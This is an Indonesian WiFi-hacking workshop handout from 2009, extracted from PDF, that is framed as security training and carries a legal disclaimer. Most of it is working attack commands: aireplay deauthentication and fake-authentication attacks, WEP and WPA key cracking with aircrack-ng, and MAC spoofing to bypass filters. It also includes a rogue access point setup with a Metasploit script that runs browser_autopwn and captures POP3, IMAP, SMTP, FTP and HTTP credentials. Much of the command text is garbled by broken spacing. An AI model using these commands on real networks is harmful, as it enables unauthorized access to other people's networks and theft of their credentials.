materi workshop wifi hacking with backtrack unair des 2009

7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

1/28

Wireless Hacking,

Web Hacking&

Security System

Oleh :

Nathan Gusti Ryan

We give you Solution with our eXPerienceWe give you Solution with our eXPerienceWe give you Solution with our eXPerienceWe give you Solution with our eXPerienceIT Training Software Hardware Technical Support Networking Server System

Website: www.xp-solution.com Email: [email protected]


2/28

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009

About Workshop Wifi Hacking

Materi ini merupakan kelanjutan dari Seminar Networking Security yang dibawakan oleh Pakar IT Nasional

Bpk Onno. W. Purbo di Universitas Airlangga tanggal 29 November 2009. Materi Wifi Hacking ini sebagaiWorkshop dari Demo yang dibawakan dalam Seminar tersebut.

Workshop atau Pelatihan Hacking bertujuan untuk mempelajari dan mendalami serta mempaktekkan System

Kerja atau Teknik Kerja seorang Hacker dalam menemukan celah keamanan atau Hole security suatu jaringan

wireless milik orang lain. Pengetahuan dan wawasan tentang Wifi Hacking ini diharapkan dapat menjadi

pengetahuan peserta workshop sehingga mampu menutup celah keamanan yang dapat diterobos oleh hacker

atau oleh orang lain sehingga Wireless Network atau Jaringan kerja yang dibangunnya betul betul jaringan

yang kuat proteksi keamanannya.

Simplenya adalah cara menjadi seorang polisi yang handal tentu harus memahami berbagai teknik kejahatan

yang dilakukan oleh penjahat yang handal. Sehingga mampu memberikan perlindungan dan menjaga

keamanan serta mampu meng-identifikasikan + menangkal + menangkap penjahat tersebut.

Dalam Workshop ini di focuskan pada pengunaan Linux BackTrack, baik BackTrack versi 4 maupun BackTrack

versi 3 Bootable USB Flashdisk. BackTrack @ Flasdisk sangat simple dan praktis sehingga dapat digunakan

setiap saat tanpa menganggu OS Laptop yang kita gunakan.

About Internet & Websites Hacking

Materi Workshop Hacking ini sebagai preview adanya berbagai celah keamanan yang memungkinkan sebuah

websites dapat di ambil alih oleh orang lain dengan SQL Injection yang memanfaatkan paramater dari

Database SQL sehingga hacker dapat memperoleh Username + Password ADMIN atau meng-inject Username

+ Password yang dapat menguasai websites tersebut.

Carding dan SQL Injection Database Hacking

eCommerceyang semakin berkembang dalam transaksi perdagangan via internet yang menjadikan eMoney

atau Virtual Money semakin diminati dan terus melejit semacam Paypal karena banyak dibutuhkan dalam

bisnis di internet. Begitu juga transaksi mengunakan Kartu Kredit yang memungkinkan adanya celah keamanan

dalam eCommercesehingga para pemain bisnis internet harus lebih waspada. Hal inilah yang mengharuskan

setiap orang memahami adanya berbagai Teknik Cardingmaupun SQL Injection terhadap data transaksi

sehingga dapat merugikan pihak lain.

By Nathan Gusti Ryan

http://artikel.xcode.or.id # http://jamesbond.xcode.or.id

www.xp-solution.com
http://artikel.xcode.or.id/http://jamesbond.xcode.or.id/http://www.xp-solution.com/http://www.xp-solution.com/http://jamesbond.xcode.or.id/http://artikel.xcode.or.id/


3/28


Joomla Hacking

Joomla Click Jacking adalah berbagai Trik yang memungkinkan menjadi hole dari websites yang dibangun

dengan Websites Joomla CMSsehingga berbagai hal yang dapat menembus Administrator Joomla.

Membuat BackTrack Bootable USB FD

Cara membuat Bootable USB FD sangat lah mudah.

1. Buka File ISO BackTrack USB dengan MagicISOatau PowerISO.2. Copy-kan semua file dari ISO tersebut ke sebuah Flashdisk 1 GB Format yang telah di format.3. Keluar dari program MagicISO atau PowerISO lalu buka flashdisk tersebut dengan Windows Explorer.4. Jalankan file BOOTINST.BAT, dan setelah selesai maka Bootable Flashdisk siap digunakan.


4/28



5/28


TAHAPAN WIFI HACKING

Tahapan yang harus dilakukan untuk Hacking Wifi adalah sbb :

1. AirMonitoring / AirScanning.2. AirCapturing / AiroDump.3. AirCracking.4. AirConnecting.5. AddOn : Mac Clonning.

Pertama kita cek dulu status driver wifi kita dengan perintah "airmon-ng"

Fungsinya untuk => cek wifi device & driver

Terlihat driver wireless adapter kita sebagai wifi0. Selanjutnya kita jika ada interface lain seperti ath0, kita

hapus dengan perintah "airmon-ng stop ath0"

Fungsinya untuk => menghentikan koneksi eksisting dan virtual driver interface wifi ath0

Selanjutnya kita cek lagi driver wifi yang masih eksis dengan perintah "airmon-ng"


6/28


Sekarang kita akan buat virtual wifi interface dengan perintah "airmon-ng start wifi0"

Fungsinya untuk => menciptakan sebuah virtual wifi interface dari wireless interface wifi0

Nah setelah tercipta virtual wifi interface dengan nama ath0, maka selanjutnya kita akan melakukan scanning

wifi network yang ada disekitar kita dengan perintah "airodump-ng ath0"

Fungsinya untuk => perintah untuk melakukan scanning wifi network yg ada disekitar kita.


7/28


Selanjutnya muncul daftar Wifi Network / BSSID, Power, Mac Address AP / ESSID, Channel yang digunakan

masing2 AP, Bandwith Speed, Jenis Enkripsi (WEP, OPN, WPA, WPA2), Jenis Authentikasi (PSK, TKIP), Nama

Wifi Network / ESSID.

=> Serta muncul muncul Mac Address ESSID dan Mac Address Station / Client yg sedang Connect

#airodump-ng ath0

CH 7 ] [ Elapsed: 16 s ] [ 2009-12-01 18:31

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:E5:99:E1:3E 47 5 0 0 13 54. WPA2 CCMP PSK BhiNetwork-Linksys-IT00:1A:70:95:AB:1A 19 25 0 0 6 54. WPA TKIP PSK BhiNetwork-Linksys00:C0:02:FF:F1:AC 59 34 18 0 1 11 WEP WEP FREE-HOTSPOT

BSSID STATION PWR Rate Lost Packets Probes

00:C0:02:FF:F1:AC 00:1D:0F:BA:DA:2D 54 0-11 0 1 FREE-HOTSPOT

=> perintah ini untuk melakukan proses scanning wifi network channel 1 / airodump serta mencatat semua

paket data di channel 1 tsb.

#airodump-ng --channel 1 --bssid 00:11:22:33:44:55 -w hasilcap ath0

--channel 1 => Channel yang ditampilkan

--bssid00:11:22:33:44:55 => Mac Address dari AP yang ditampilkan

-whasilcap => file output dari hasil scanning

ath0 => virtual wifi interface

--ivs => format penyimpanan hasil capture sebagai file ivs


8/28



9/28


#aircrack-ng hasilcap.cap

Fungsinya => untuk menganalisa hasil capture packet dari airdump.


10/28


Kita juga bisa melakukan monitoring jaringan wireless ini mengunakan Kismet

Selanjutnya kita akan melihat Clientyang terkoneksi ke Access Point ini :Tekan space

S - untuk men-sort

S - untuk men-sort terhadap SSID

Tekan Panah Bawah - Letakan di SSIDAPyang kita inginkan.

ENTER - detailAP

C - lihat siapa saja clientAPtersebut

Selanjutnya akan terlihat daftar Client seperti dibawah ini :


11/28



12/28


AIREPLAY

bt ~ # aireplay-ng

Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'OtreppeOriginal work: Christophe Devinehttp://www.aircrack-ng.org

usage: aireplay-ng

Filter options:

-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detection

Replay options:

-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packet

Fakeauth attack options:

-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key auth

Arp Replay attack options:

-j : inject FromDS packets

Fragmentation attack options:

-k IP : set destination IP in fragments-l IP : set source IP in fragments

Test attack options:

-B : activates the bitrate test

source options:

-i iface : capture packets from this interface-r file : extract packets from this pcap file

attack modes (Numbers can still be used):

--deauth count : deauthenticate 1 or all stations (-0)
http://www.aircrack-ng.org/http://www.aircrack-ng.org/


13/28


--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4)--fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)

--help : Displays this usage screen

############

#aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 01:12:23:34:45:56 ath0

-b => MAC AP / BSSID

-h => MAC Source / MAC Wifi kita

-c / -d => MAC Client / Destination

ath0 => virtual wifi interface

Fungsinya => Untuk mempercepat proses pengiriman packet data dari Client ke AP


14/28


Deauthentikasi Aireplay :

Fungsinya => Untuk menghentikan koneksi dari Client ke AP sehingga Airdump dapat melakukan capture dari

koneksi awal dari Client ke AP.

=> (Serangan utk Disconnect & Reconnect koneksi suatu client ke AP)

#aireplay-ng --deauth 10 -a 00:80:48:7E:CC:57 -c 02:19:FC:01:00:C4 ath0

10 => jumlah deauthentikasi / penyerangan yang akan dilakukan

-a => MAC AP

-c => MAC Client / Workstation

Menganti Mac Address Interface Wifi :

bt ~ # macchanger -A wifi0

Current MAC: a2:9b:5c:b2:de:70 (unknown)

Faked MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)

bt ~ # macchanger -s wifi0

Current MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)

bt ~ # macchanger -m 00:21:63:ad:7c:3a wifi0

Current MAC: 00:21:63:ad:7c:3b (unknown)

Faked MAC: 00:21:63:ad:7c:3a (unknown)


15/28


Menyambung ke HotSpot

Untuk menyambungkan diri ke HotSpotmenggunakan text mode. Langkah yang biasa digunakan

1. Scanning frekuensi

# i wl i st scanni ng

2. Set ESSIDinterface wireless(misalnya eth1) agar sama dengan HotSpot

# i wconf i g eth1 essi d HotSpotSSI D

3. Cek apakah sudah tersambung

# i wconf i g eth1

4. Minta IP addresske DHCP Server

# dhcl i ent et h1

Beberapa Cara untuk Cek Sambungan

1. Cek apakah routingke Internetsudah di berikan oleh DHCP Server. Perhatikan IP gatewayuntuk

tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,

# net st at - nr

2. Ping ke gatewayHotSpot

# pi ng


16/28


Scanning HotSpot

Scanning Keberadaan HotSpotdapat dilakukan menggunakan text mode.

iwlist

Cara yang paling sederhana adalah menggunakan perintah

# i wl i st scanni ng

Kismet

cara yang lebih rumit menggunakan kismet

# apt - get i nst al l ki smet# vi / et c/ ki smet / ki smet . confsource=none, none, addme - - > source=i pw3945, wl an0, i pwsourcesource=none, none, addme - - > source=zd1211, eth1, zysour cesource=none, none, addme - - > source=at h5k, at h0, at hsour ce

Baca http://www.kismetwireless.net/documentation.shtmluntuk melihat source yang dikenali Kismet

# ki smet

airodump

Mematikan mode monitordi WLANinterface

# ai r mon-ng st op wl an0

Mengaktifkan mode monitordi WLANinterface

# ai r mon- ng st ar t wl an0 1

Akan keluar kira-kira

I nt er f ace Chi pset Dr i verwl an0 I ntel 3945ABG i wl 3945 - [ phy0]

( moni t or mode enabl ed on mon2)mon0 I ntel 3945ABG i wl 3945 - [ phy0]mon1 I ntel 3945ABG i wl 3945 - [ phy0]

Scanning

# ai r odump- ng mon0
http://www.kismetwireless.net/documentation.shtmlhttp://www.kismetwireless.net/documentation.shtml


17/28


Teknik Menjebol WEP Menggunakan

Airodump dan Aircrack

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya diperuntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan

untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak

tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan

aparat penegak hukum.

Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut inimembutuhkan trafficpaket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang

melakukan transfer file di jaringan HotSpot. Jika tidak ada trafficsama sekali, sampai kapanpun akan

susah untuk di crackWEP-nya.

Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID/ MAC AddresssAP, (2) MAC addressWLANkita, dan (3) Channelyang digunakan AP.

Misalnya,

BSSI D 00: 30: 4F: 4E: 2B: 50WI FI 00: 11: 6b: 33: d3: 90CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00: 30: 4F: 4E: 2B: 50export WI FI =00: 11: 6b: 33: d3: 90expor t CHANNEL=1

Setup supaya interface WiFimasuk ke mode monitoring menggunakan perintah

ai r mon- ng st art wl an0 1

Biasanya akan tampil kira-kira sebagai berikut


( moni t or mode enabl ed onmon0)

Perhatikan baik-baik bahwa interfacewlan0yang berubah menjadi mode monitor adalah mon0. Kita

harus menggunakan interface mon0untuk melakukan monitor.

Jalankan airodumpdi WLANmon0

ai r odump- ng - - i vs - w hasi l capt ur e - - bssi d $AP - - channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

ai r odump- ng - - out put - f ormat i vs - w hasi l capt ur e - - bssi d $AP - - channel $CHANNELmon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..


18/28


Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses

cracking WEPpastikan kita dapat menangkap lebih dari 5000 paket.

Jalankan aircrackuntuk mengcrack WEP

# ai r cr ack- ng - a 1 - e essi dapyangakandi cr ack - n 64 hasi l capt ur e- 01. i vs

misalnya

# ai r cr ack- ng - a 1 - e l i nksys - n 64 hasi l capt ur e- 01. i vs# ai r cr ack- ng - a 1 - e $AP - n 64 hasi l capt ur e- 01. i vs

Bisa juga menggunakan perintah

# ai r cr ack- ng - a 1 - n 64 hasi l capt ur e- 01. i vs

Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang

sedang transfer file di jaringan HotSpot.


19/28


Teknik Menjebol WEPInformasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di

peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan




Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.

Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID/ MAC AddresssAP, (2) MAC addressWLANkita, dan (3) Channel yang digunakan AP.

Misalnya,

BSSI D 00: 30: 4F: 4E: 2B: 50WI FI 00: 11: 6b: 33: d3: 90

CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan

# expor t AP=00: 30: 4F: 4E: 2B: 50# expor t WI FI =00: 11: 6b: 33: d3: 90# expor t CHANNEL=1

Teknik mencari data BSSID& CHANNELdi atas menggunakan perintah, misalnya, card WLANdi

eth1. Pastikan bahwa eth1 berada pada mode monitor

# i wconf i g et h1 mode moni t or# i wconf i g eth1# ai r mon- ng st ar t eth1# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1

Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya

biasanya sukar untuk dapat berasosiasi dengan Access Pointyang terenkripsi. Jika ada bug di Access

Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Pointtersebut

# ai r epl ay- ng - 1 0 - e ssi daccesspoi nt - a $AP - h $WI FI et h1

Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk

memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah

# ai r epl ay- ng - 5 - b $AP - h $WI FI eth1

Setelah kita cukup banyak berhasil menangkap paket. Proses crackingWEPdapat dilakukan

menggunakan

# ai r cr ack- ng - a 1 - n 64 hasi l capt ur e. i vs


20/28


Teknik Menjebol WPA

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di





Menjebol WPAhampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba

langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.

Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID/ MAC AddresssAP, (2) MAC addressWLANkita, dan (3) Channelyang digunakan AP.

Misalnya,

BSSI D 00: 30: 4F: 4E: 2B: 50WI FI 00: 11: 6b: 33: d3: 90CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00: 30: 4F: 4E: 2B: 50export WI FI =00: 11: 6b: 33: d3: 90expor t CHANNEL=1

Setup supaya interface WiFimasuk ke mode monitoring menggunakan perintah

ai r mon- ng st art wl an0 1

Biasanya akan tampil kira-kira sebagai berikut


( moni t or mode enabl ed onmon0)

Perhatikan baik-baik bahwa interfacewlan0yang berubah menjadi mode monitor adalah mon0. Kita

harus menggunakan interface mon0untuk melakukan monitor.

Jalankan airodumpdi WLANmon0

ai r odump-ng - w hasi l capture - - bssi d $AP - - channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

ai r odump- ng - - out put - f ormat pcap - w hasi l capt ur e - - bssi d $AP - - channel $CHANNELmon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..

Untuk mempercepat proses gunakan aireplay-ng

ai r epl ay- ng - 0 1 - a 00: 14: 6C: 7E: 40: 80 - c 00: 0F: B5: FD: FB: C2 mon0


21/28


Dimana :

- a MAC AP- c MAC cl i ent

Kunci dari proses cracking WPAadalah ketersediaan kamus silahkan di cek ke

http://www.aircrack-ng.org/doku.php?id=faq http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.

Jalankan aircrackuntuk meng-crack WPA

# ai r cr ack- ng - w kamuspass. t xt - b 00: 14: 6C: 7E: 40: 80 psk*. cap- b MAC BSSI D

Versi yang lebih panjang

# ai r cr ack- ng - a 2 - e essi dapyangakandi cr ack - n 64 hasi l capt ur e* - w kamuspass. t xt# ai r cr ack- ng - a 2 - e l i nksys - n 64 hasi l capt ur e* - w kamuspass. t xt# ai r cr ack- ng - a 2 - e $AP - n 64 hasi l capt ur e* - w kamuspass. t xt

Bisa juga menggunakan perintah

# ai r cr ack- ng - a 2 - n 64 hasi l capt ur e* - w kamuspass. t xt

Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA
http://www.aircrack-ng.org/doku.php?id=faqhttp://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_networkhttp://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlistshttp://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlistshttp://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_networkhttp://www.aircrack-ng.org/doku.php?id=faq


22/28


Menemukan Hidden SSID






Cara yang paling ampuh untuk menemukan Hidden SSIDadalah menggunakan kismet

# ki smet

Hidden SSIDakan berwarna biru dan di tutup oleh tanda seperti tampak pada gambar.

tampilan kismet, warna biru adalah Hidden SSID

Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan gagal

lumayan tinggi.

Pertama, scanning frekuensipada WLANdi eth1

# ai r mon- ng st op eth1# ai r mon- ng st ar t eth1

# ai r odump- ng et h1

Jalankan airodump-ng terus menerus di sebuah Windows.

Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC 00:11:6B:60:86:91 melalui

eth1

# ai r epl ay- ng - - deaut h 1 - a 00: 11: 6B: 60: 86: 91 et h1

Nanti akan keluar BSSIDdi airodump-ng

http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking
http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hackinghttp://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking


23/28


Teknik Man-in-The-Middle Attack / FakeAP

Contents

1 Versi Singkat membuat Fake AP 2 Versi lengkap untuk MiTM attack

3 Referensi 4 Pranala Menarik

Versi Singkat membuat Fake APai r base- ng - e "Free Wi Fi " - P -C 30 - v wl an0

Versi lengkap untuk MiTM attack

Siapkan software yang di butuhkan

sudo apt - get i nst al l subver si on

Summary perintah yang digunakan

svn co ht t p: / / t r ac. ai rcr ack- ng. or g/ svn/ t runk/ ai r cr ack- ngcd ai r crack- ng/makemake i nst al lsudo su -ai r mon- ng st art wl an0ai r base- ng - e "Evi l Wi r el ess" - v mon0 &i f conf i g at 0 10. 0. 0. 1 net mask 255. 255. 255. 0

apt - get i nst al l dhcp3- ser vervi / et c/ dhcp3/ evi l - wi r el ess. confopt i on domai n- name- server s 10. 0. 0. 1;

def aul t - l ease- t i me 60;max- l ease- t i me 72;

ddns- updat e- st yl e none;

aut hor i t at i ve;

l og- f aci l i ty l ocal 7;

subnet 10. 0. 0. 0 netmask 255. 255. 255. 0 {r ange 10. 0. 0. 100 10. 0. 0. 254;opt i on r out er s 10. 0. 0. 1;opt i on domai n- name- server s 10. 0. 0. 1;}dhcpd3 - cf / et c/ dhcp3/ evi l - wi r el ess. confi f conf i g mon0 mt u 1800i f conf i g at0 mt u 1400svn co ht t p: / / met aspl oi t . com/ svn/ f r amewor k3/ t r unk msf 3(butuh waktu lama & bandwidth)

Menggunakan gems rupanya rewel & belum stabil :( ..

apt - get i nst al l r ubygemsgem i nst al l acti ver ecor d sql i t e3- r uby (butuh waktu lama & bandwidth)vi evi l wi rel ess. rc
http://trac.aircrack-ng.org/svn/trunk/http://metasploit.com/svn/framework3/trunkhttp://metasploit.com/svn/framework3/trunkhttp://trac.aircrack-ng.org/svn/trunk/


24/28


l oad db_sql i t e3db_creat e / r oot / evi l wi r el ess. db

use auxi l i ary/ server / br owser_aut opwn

set g AUTOPWN_HOST 10. 0. 0. 1set g AUTOPWN_PORT 55550set g AUTOPWN_URI / ads

set LHOST 10. 0. 0. 1set LPORT 45000set SRVPORT 55550set URI PATH / ads

r un

use auxi l i ar y/ ser ver / capt ur e/ pop3set SRVPORT 110set SSL f al ser un

use auxi l i ar y/ ser ver / capt ur e/ pop3

set SRVPORT 995set SSL t r uer un

use auxi l i ar y/ ser ver / capt ur e/ f t pr un

use auxi l i ar y/ ser ver / capt ur e/ i mapset SSL f al seset SRVPORT 143r un

use auxi l i ar y/ ser ver / capt ur e/ i map

set SSL t r ueset SRVPORT 993r un

use auxi l i ar y/ ser ver / capt ur e/ smt pset SSL f al seset SRVPORT 25r un

use auxi l i ar y/ ser ver / capt ur e/ smt pset SSL t r ueset SRVPORT 465r un

use auxi l i ar y/ ser ver / f akednsunset TARGETHOSTset SRVPORT 5353r un

use auxi l i ar y/ ser ver / f akednsunset TARGETHOSTset SRVPORT 53r un

use auxi l i ar y/ ser ver / capt ur e/ ht t pset SRVPORT 80

set SSL f al ser un

use auxi l i ar y/ ser ver / capt ur e/ ht t pset SRVPORT 8080


25/28


set SSL f al ser un

use auxi l i ar y/ ser ver / capt ur e/ ht t pset SRVPORT 443set SSL t r uer un

use auxi l i ar y/ ser ver / capt ur e/ ht t p

set SRVPORT 8443set SSL t r uer un. / msf consol e - r evi l wi rel ess. r c

Referensi

http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html

http://0x80.org/blog/?p=131- The Evil Access Point http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html-

How to create Face AP

http://ww2.mastaputa.com:9999/?p=29 http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-

airchat
http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-http://0x80.org/blog/?p=131http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.htmlhttp://ww2.mastaputa.com:9999/?p=29http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-http://ww2.mastaputa.com:9999/?p=29http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.htmlhttp://0x80.org/blog/?p=131http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-


26/28


Teknik Melewati Pembatasan MAC Address






Sebagian APakan memfilter MAC addressclient. Teknik menemukan MAC addressclient yang di

ijinkan lewat oleh APmenggunakan Kismetadalah

# ki smet

Lakukan

spaceS - unt uk men- sor tS - unt uk men- sor t t erhadap SSI DPanah Bawah - Let akan di SSI D AP yang ki t a i ngi nkan.ENTER - det ai l APC - l i hat si apa saj a cl i ent AP t er sebut

Pastikan airmon tidak aktif di WLANeth1

# ai r mon- ng st op eth1

Untuk mengubah MAC addressdari WLANdi eth1 menjadi sama dengan MAC addressclient yang

diijinkan AP

# i f conf i g eth1 down# i f conf i g et h1 hw et her 00: 16: CF: C1: FA: F5# i f conf i g et h1 up

Alternatif lain

# i f conf i g eth1 down# macchanger - mac 00: 16: CF: C1: FA: F5 et h1# i f conf i g et h1 up

atau untuk random MAC address

# macchanger - r et h1


27/28


Aplikasi Yang Perlu DisiapkanBeberapa paket softwareyang dibutuhkan :

# apt - get i nst al l gcc g++ l i nux- ker nel - header s l i bpcap0. 8 l i bpcap0. 8- dev l i bnet 1l i bnet 1- dev l i bdnet \l i bdnet- dev subver si on python2. 4 python2. 4- dev python- pyx python- cr ypt o python-psyco dhcp3- ser ver bi nd9 apache2

Install beberapa aplikasi yang lebih fokus untuk hackingwireless

# apt - get i nst al l ki smet scapy macchanger et t er cap dsni f f ai r cr ack- ng

Pada Ubuntu9.04 aplikasi yang di instalasi adalah

# apt - get i nst al l ki smet python- scapy macchanger et t er cap dsni f f ai r cr ack-ng

Download source codeaplikasi berikut jika diperlukan

# cd / usr/ l ocal / src# svn co ht t ps: / / 802. 11ni nj a. net / svn/ l or con/ t r unk l or con# wget ht t p: / / downl oad. ai r crack- ng. or g/ ai r crack- ng- 0. 9. 3. t ar . gz# wget ht t p: / / s i d. rst ack. org/ code/ wi f i t ap/ wi f i t ap- 0. 4. 0. t gz

# wget ht t p: / / easynews. dl . sour cef or ge. net / sour cef or ge/ ai r pwn/ ai r pwn- 1. 30. t gzBagi pengguna Atheros& RT73 perlu mendownload

# wget ht t p: / / snapshot s. madwi f i . or g/ madwi f i - ng/ madwi f i - ng- r 2277- 20070414. t ar . gz# wget ht t p: / / homepages. t u- dar mst adt . de/ ~p_l ar bi g/ wl an/ r t 2570- k2wr l z- 1. 6. 1. t ar . bz2# wget ht t p: / / homepages. t u- dar mst adt . de/ ~p_l ar bi g/ wl an/ r t 73- k2wr l z- 1. 1. 0. t ar . bz2

Compile & Install Lorcon

# cd / usr/ l ocal / src/ l or con/# . / conf i gur e \- prefi x=/ usr \- sysconf di r =/ et c/ l or con \

- l ocal statedi r=/ var \- mandi r =/ usr / shar e/ man\- i nf odi r =/ usr/ share/ i nf o# make# make i nst al l

Sebaiknya di lakukan melalui airpwnseperti di bawah ini, Compile & Install Airpwn

# cd / usr/ l ocal / src/# t ar zxvf ai r pwn- 1. 3. t gz# cd / usr/ l ocal / src/ ai r pwn- 1. 3# t ar zxvf l or con- cur r ent . t gz# cp - Rf / usr/ l ocal / src/ l or con/ * / usr/ l ocal / src/ ai r pwn- 1. 3/ l or con# cd / usr/ l ocal / src/ ai r pwn- 1. 3/ l or con

# . / conf i gur e \- prefi x=/ usr \- sysconf di r =/ et c/ l or con \- l ocal statedi r=/ var \- mandi r =/ usr / shar e/ man\- i nf odi r =/ usr/ share/ i nf o# make# make i nst al l

Langkah selanjutnya kita perlu menginstall source codekernel:( ...

# cd / usr/ l ocal / src/ ai r pwn- 1. 3# . / conf i gur e# make

# make i nst al l

Install Wifitap& Airsnarf

# cd / usr/ l ocal / src/# t ar zxvf wi f i t ap- 0. 4. 0. t gz
https://802.11ninja.net/svn/lorcon/trunkhttp://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gzhttp://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgzhttp://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgzhttp://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gzhttp://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gzhttp://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgzhttp://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgzhttp://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gzhttps://802.11ninja.net/svn/lorcon/trunk


28/28


Instalasi Driver MadWiFi

Bagi anda yang menggunakan chipset Atherostampaknya perlu menginstalasi driver MadWiFi.

Instalasi kebutuhan untuk compile

# apt - get i nstal l bui l d- essent i al perl

Download source codemadwifidari

ht t p: / / at h5k. or g/ wi ki / MadWi f i ht t p: / / sour cef or ge. net / pr oj ect / showf i l es. php?gr oup_i d=82936

Copy dan buka source code

# cp madwi f i - 0. 9. 4. t ar . gz / usr/ l ocal / src/# cd / usr/ l ocal / src

# t ar zxvf madwi f i - 0. 9. 4. t ar . gz# cd / usr/ l ocal / src/ madwi f i - 0. 9. 4

Compile & Install MadWifiDriver

# make# make i nst al l

Load module

# modprobe at h_pci

Source :

http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking

(CL) Onno W. Purbo
http://ath5k.org/wiki/MadWifihttp://sourceforge.net/project/showfiles.php?group_id=82936http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hackinghttp://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hackinghttp://sourceforge.net/project/showfiles.php?group_id=82936http://ath5k.org/wiki/MadWifi

